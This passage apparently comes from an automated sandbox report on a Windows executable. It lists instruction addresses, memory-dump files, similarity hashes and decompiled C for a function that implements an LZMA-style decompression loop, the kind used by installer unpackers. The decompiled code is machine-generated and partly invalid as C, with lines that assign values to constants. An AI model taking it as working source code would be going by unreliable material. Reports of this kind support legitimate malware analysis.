                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00000000
                  0x00406ee1
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00000000
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00407044
                  0x0040704a
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406ea6
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00406f83
                  0x00000000
                  0x00406df8

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                  • Instruction ID: f0f32deb93356653934a7f7f8ad788a679267befe7528616fd809e2a8ddaf9c6
                  • Opcode Fuzzy Hash: 7d0c270478a2f9a3adf3a01af42e260dfbb4be2f4416bec3860fa0cf1f45473d
                  • Instruction Fuzzy Hash: C8913070D00229CBDF28CF98C854BADBBB1FF44305F15816AD856BB281C779AA96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406B0A, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406B0A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407061))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
